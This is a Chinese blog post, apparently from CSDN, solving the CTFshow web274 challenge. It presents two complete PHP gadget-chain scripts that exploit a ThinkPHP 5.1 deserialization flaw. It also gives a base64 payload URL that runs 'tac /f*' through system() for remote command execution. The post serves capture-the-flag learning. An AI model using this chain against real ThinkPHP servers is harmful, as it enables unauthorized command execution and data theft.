CTFshow 反序列化 web274

最新推荐文章于 2024-05-12 12:06:40 发布
最新推荐文章于 2024-05-12 12:06:40 发布
阅读量311 收藏
点赞数
分类专栏: CTFshow 文章标签: php ajax 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/122890216
版权

目录

源码

源码中提示反序列化入口

思路

去网上搜下ThinkPHP 5.1相关的漏洞

题解

找到2个exp

第一个

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        //GET传参 shell
        $this->data = ['shell' => new Request()];
        $this->append = ['shell' => []];
    }
}
class Request{
    protected $filter;
    protected $hook = [];
    protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '_pjax',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ['var_pjax' => 'shell'];
        $this->hook = ['visible' => [$this,'isPjax']];
    }
}
namespace think\process\pipes;
use think\model\Pivot;

class Windows{
    private $files = [];
    public function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;
use think\Model;

class Pivot extends Model{
}

use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

第二个

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
         //GET传参 shell
        $this->data = ['shell' => new Request()];
        $this->append = ['shell' => []];
    }
}
class Request{
    protected $filter;
    protected $hook = [];
    protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '_pjax',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ['var_ajax' => 'shell'];
        $this->hook = ['visible' => [$this,'isAjax']];
    }
}
namespace think\process\pipes;
use think\model\Pivot;

class Windows{
    private $files = [];
    public function __construct(){
        $this->files = [new Pivot()];
    }
}

namespace think\model;
use think\Model;

class Pivot extends Model{
}

use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>


?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czo1OiJzaGVsbCI7YTowOnt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6NToic2hlbGwiO086MTM6InRoaW5rXFJlcXVlc3QiOjM6e3M6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7czo3OiIAKgBob29rIjthOjE6e3M6NzoidmlzaWJsZSI7YToyOntpOjA7cjo3O2k6MTtzOjY6ImlzQWpheCI7fX1zOjk6IgAqAGNvbmZpZyI7YToxOntzOjg6InZhcl9hamF4IjtzOjU6InNoZWxsIjt9fX19fX0=&shell=tac /f*

总结

水题

Kradress
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java序列工具
11-21
类似地,WebLogic也可能在处理序列的JMX(Java管理扩展)或Web服务请求时遇到安全问题。 3. **WebSphere**:IBM的产品,同样遵循Java EE标准。序列漏洞可能出现在处理JNDI(Java命名和目录接口)查找、EJB...
c#序列序列
05-24
什么叫序列? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列,要能被序列,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
ctfshow 序列(254-278)
fainpo的博客
06-07 693
用 |O:4:"User":3:{s:8:"username";可以看到fuck成功替换成了loveU,s:4这里表示的是4个字符,但是由于我们替换了,变成了5个字符,他就只会看love,这个U就不会看了。一般有这种str_replace将4个字符,替换成5个字符,或者任意的,只要字符替换的个数不相等,都是字符串逃逸的应用场景。将会以我们构造的token为admin为准,后面的token为user的值他就会丢弃,因为我们已经闭合了。
CTFshow 序列
starttv的博客
12-09 769
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
ctfshow web274
最新发布
2301_81040377的博客
05-12 226
thinkphp框架序列漏洞。
ctf-show序列
m0_74097148的博客
03-15 377
便造成了自动序列的发生。
ctf_show笔记篇(web入门---序列
whale_waves的博客
03-19 1499
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变, $a是什么$b就是什么。利用php处理畸形的序列的处理措施, 当php收到畸形的序列时, 会因为对此序列的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列, php就会自动把|前面的当作键名用, 而会序列|后的值。
Java序列实战.pdf
08-08
本议题将从那些经典案例入手,分析攻击方和防御方的对抗过程。会从fastjson与weblogic的两个经典漏洞,带大家傲游序列的世界。 序列入门 Fastjson Weblogic 序列防御
C# xml序列序列
01-05
在C#编程中,XML序列序列是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
shiro序列脚本.zip
07-28
标题 "shiro序列脚本.zip" 指向的是一个与Apache Shiro安全框架相关的序列漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
ctfshow web入门 序列
Sentiment的博客
12-26 1841
web254
ctfshow序列
njh18790816639的博客
04-18 1103
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
CTFshow刷题日记-WEB-序列篇(上,254-263)
Love&Share
09-22 2718
序列 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
ctfshow web入门序列
qq_53063436的博客
11-06 1022
魔术变量: __sleep() //在对象被序列之前运行 __wakeup() //将在序列之后立即调用(当序列时变量个数与实际不符是会绕过) __construct() //在类实例时,会触发进行初始 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //获得一个类的成员变量时调
mysql 序列_php序列
weixin_39854778的博客
12-21 312
一、 什么是序列,什么是序列编程语言有很多数据类型,比如常见的字符串,整数,数组$str="luoke";$int=10;$arr=array("luoke","10");var_dump($str,$int,$arr);这些我们都可以用serialize将其序列输出echo serialize($str);echo serialize($int);echo seriali...
序列序列的详解
热门推荐
tree_ifconfig的博客
09-19 30万+
一、基本概念 1、序列序列的定义:     (1)Java序列就是指把Java对象转换为字节序列的过程         Java序列就是指把字节序列恢复为Java对象的过程。    (2)序列最重要的作用:在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。        序列的最重要的作用:根据字节流中保存的对...
CTFShow web入门刷题记录-爆破
打酱油的杯具的博客
11-29 2278
CTFShow web入门刷题记录-爆破 web21 先下载提供的密码包,查看hint得知考点为tomcat 账号提示为amdin,点击提交并使用burpsuit抓包 发现底下为一串经过base64编码的文字,翻译后得知为admin: 得知提交格式为:账号:密码 传入intruder,选中并添加$ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xsSzs95u-1606660930041)(C:/Users/%E8%83%A1%E5%A5%87/AppData/Roami
ctfshow序列模块
whisper921的博客
04-07 5923
web254 GET传参即可: ?username=xxxxxx&password=xxxxxx 得到flag ctfshow{03b60d01-62ef-4703-8217-684bb53b866a} web255 web256 把PHP里面的username和password改成不一样的即可,然后和get传入的对应。 web257 web258 web259 web260 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值